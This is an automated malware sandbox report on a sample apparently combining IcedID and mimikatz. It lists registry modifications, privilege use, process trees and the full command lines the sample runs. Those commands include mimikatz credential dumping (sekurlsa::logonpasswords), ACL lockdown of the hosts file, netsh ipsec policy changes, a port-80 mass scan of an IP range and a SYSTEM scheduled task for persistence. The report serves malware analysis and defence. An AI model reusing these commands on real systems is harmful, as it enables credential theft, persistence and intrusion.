Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nimusahes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rgiaeelul.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ogmqci.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ysyeeye.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 1380 cmd.exe 3028 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x000b000000023b7d-6.dat nsis_installer_2 behavioral2/files/0x000c000000023af9-15.dat nsis_installer_1 behavioral2/files/0x000c000000023af9-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 41 IoCs
Processes:
ysyeeye.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ysyeeye.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ysyeeye.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ysyeeye.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ysyeeye.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ysyeeye.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ysyeeye.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sbgiuuhde.exe -
Modifies registry class 14 IoCs
Processes:
ysyeeye.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" ysyeeye.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" ysyeeye.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" ysyeeye.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 3044 schtasks.exe 556 schtasks.exe 1464 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
ysyeeye.exepid Process 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 660 660 660 660 660 660 660 660 660 660 660 660 660 660 660 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exepid Process 2136 2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exeysyeeye.exeysyeeye.exevfshost.exesbgiuuhde.exerniyyi.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exesbgiuuhde.exedescription pid Process Token: SeDebugPrivilege 2136 2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 748 ysyeeye.exe Token: SeDebugPrivilege 1396 ysyeeye.exe Token: SeDebugPrivilege 3628 vfshost.exe Token: SeDebugPrivilege 976 sbgiuuhde.exe Token: SeLockMemoryPrivilege 2612 rniyyi.exe Token: SeLockMemoryPrivilege 2612 rniyyi.exe Token: SeDebugPrivilege 3564 sbgiuuhde.exe Token: SeDebugPrivilege 4520 sbgiuuhde.exe Token: SeDebugPrivilege 3312 sbgiuuhde.exe Token: SeDebugPrivilege 3680 sbgiuuhde.exe Token: SeDebugPrivilege 920 sbgiuuhde.exe Token: SeDebugPrivilege 628 sbgiuuhde.exe Token: SeDebugPrivilege 4504 sbgiuuhde.exe Token: SeDebugPrivilege 3728 sbgiuuhde.exe Token: SeDebugPrivilege 372 sbgiuuhde.exe Token: SeDebugPrivilege 712 sbgiuuhde.exe Token: SeDebugPrivilege 4480 sbgiuuhde.exe Token: SeDebugPrivilege 1100 sbgiuuhde.exe Token: SeDebugPrivilege 3560 sbgiuuhde.exe Token: SeDebugPrivilege 3900 sbgiuuhde.exe Token: SeDebugPrivilege 3496 sbgiuuhde.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exeysyeeye.exeysyeeye.exexohudmc.exeogmqci.exeysyeeye.exeysyeeye.exepid Process 2136 2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe 2136 2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe 748 ysyeeye.exe 748 ysyeeye.exe 1396 ysyeeye.exe 1396 ysyeeye.exe 3464 xohudmc.exe 4824 ogmqci.exe 5008 ysyeeye.exe 5008 ysyeeye.exe 1044 ysyeeye.exe 1044 ysyeeye.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.execmd.exeysyeeye.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 2136 wrote to memory of 1380 2136 2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe 85 PID 2136 wrote to memory of 1380 2136 2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe 85 PID 2136 wrote to memory of 1380 2136 2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe 85 PID 1380 wrote to memory of 3028 1380 cmd.exe 88 PID 1380 wrote to memory of 3028 1380 cmd.exe 88 PID 1380 wrote to memory of 3028 1380 cmd.exe 88 PID 1380 wrote to memory of 748 1380 cmd.exe 90 PID 1380 wrote to memory of 748 1380 cmd.exe 90 PID 1380 wrote to memory of 748 1380 cmd.exe 90 PID 1396 wrote to memory of 2256 1396 ysyeeye.exe 92 PID 1396 wrote to memory of 2256 1396 ysyeeye.exe 92 PID 1396 wrote to memory of 2256 1396 ysyeeye.exe 92 PID 2256 wrote to memory of 3296 2256 cmd.exe 94 PID 2256 wrote to memory of 3296 2256 cmd.exe 94 PID 2256 wrote to memory of 3296 2256 cmd.exe 94 PID 2256 wrote to memory of 4128 2256 cmd.exe 95 PID 2256 wrote to memory of 4128 2256 cmd.exe 95 PID 2256 wrote to memory of 4128 2256 cmd.exe 95 PID 2256 wrote to memory of 3216 2256 cmd.exe 96 PID 2256 wrote to memory of 3216 2256 cmd.exe 96 PID 2256 wrote to memory of 3216 2256 cmd.exe 96 PID 2256 wrote to memory of 2372 2256 cmd.exe 97 PID 2256 wrote to memory of 2372 2256 cmd.exe 97 PID 2256 wrote to memory of 2372 2256 cmd.exe 97 PID 2256 wrote to memory of 1916 2256 cmd.exe 98 PID 2256 wrote to memory of 1916 2256 cmd.exe 98 PID 2256 wrote to memory of 1916 2256 cmd.exe 98 PID 2256 wrote to memory of 988 2256 cmd.exe 99 PID 2256 wrote to memory of 988 2256 cmd.exe 99 PID 2256 wrote to memory of 988 2256 cmd.exe 99 PID 1396 wrote to memory of 3512 1396 ysyeeye.exe 100 PID 1396 wrote to memory of 3512 1396 ysyeeye.exe 100 PID 1396 wrote to memory of 3512 1396 ysyeeye.exe 100 PID 1396 wrote to memory of 1976 1396 ysyeeye.exe 102 PID 1396 wrote to memory of 1976 1396 ysyeeye.exe 102 PID 1396 wrote to memory of 1976 1396 ysyeeye.exe 102 PID 1396 wrote to memory of 4892 1396 ysyeeye.exe 104 PID 1396 wrote to memory of 4892 1396 ysyeeye.exe 104 PID 1396 wrote to memory of 4892 1396 ysyeeye.exe 104 PID 1396 wrote to memory of 3816 1396 ysyeeye.exe 109 PID 1396 wrote to memory of 3816 1396 ysyeeye.exe 109 PID 1396 wrote to memory of 3816 1396 ysyeeye.exe 109 PID 3816 wrote to memory of 2204 3816 cmd.exe 111 PID 3816 wrote to memory of 2204 3816 cmd.exe 111 PID 3816 wrote to memory of 2204 3816 cmd.exe 111 PID 2204 wrote to memory of 1628 2204 wpcap.exe 112 PID 2204 wrote to memory of 1628 2204 wpcap.exe 112 PID 2204 wrote to memory of 1628 2204 wpcap.exe 112 PID 1628 wrote to memory of 336 1628 net.exe 114 PID 1628 wrote to memory of 336 1628 net.exe 114 PID 1628 wrote to memory of 336 1628 net.exe 114 PID 2204 wrote to memory of 2136 2204 wpcap.exe 115 PID 2204 wrote to memory of 2136 2204 wpcap.exe 115 PID 2204 wrote to memory of 2136 2204 wpcap.exe 115 PID 2136 wrote to memory of 376 2136 net.exe 117 PID 2136 wrote to memory of 376 2136 net.exe 117 PID 2136 wrote to memory of 376 2136 net.exe 117 PID 2204 wrote to memory of 1304 2204 wpcap.exe 118 PID 2204 wrote to memory of 1304 2204 wpcap.exe 118 PID 2204 wrote to memory of 1304 2204 wpcap.exe 118 PID 1304 wrote to memory of 4084 1304 net.exe 120 PID 1304 wrote to memory of 4084 1304 net.exe 120 PID 1304 wrote to memory of 4084 1304 net.exe 120 PID 2204 wrote to memory of 2936 2204 wpcap.exe 121
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1692
-
C:\Windows\TEMP\ldagsiybe\rniyyi.exe"C:\Windows\TEMP\ldagsiybe\rniyyi.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-14_904cc8ea3750d5f4349f5dc261f41eee_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\siltueee\ysyeeye.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3028
-
-
C:\Windows\siltueee\ysyeeye.exeC:\Windows\siltueee\ysyeeye.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:748
-
-
-
C:\Windows\siltueee\ysyeeye.exeC:\Windows\siltueee\ysyeeye.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3296
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3216
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1916
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:988
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3512
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1976
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4892
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bgysuulnn\sbbfgiqug\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\bgysuulnn\sbbfgiqug\wpcap.exeC:\Windows\bgysuulnn\sbbfgiqug\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:336
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:376
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4084
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2936 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:5104
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:764 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1516 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:372
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4880 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4340
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bgysuulnn\sbbfgiqug\nimusahes.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\bgysuulnn\sbbfgiqug\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:3892 -
C:\Windows\bgysuulnn\sbbfgiqug\nimusahes.exeC:\Windows\bgysuulnn\sbbfgiqug\nimusahes.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\bgysuulnn\sbbfgiqug\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bgysuulnn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bgysuulnn\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1952 -
C:\Windows\bgysuulnn\Corporate\vfshost.exeC:\Windows\bgysuulnn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bfyenbney" /ru system /tr "cmd /c C:\Windows\ime\ysyeeye.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1004 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bfyenbney" /ru system /tr "cmd /c C:\Windows\ime\ysyeeye.exe"3⤵
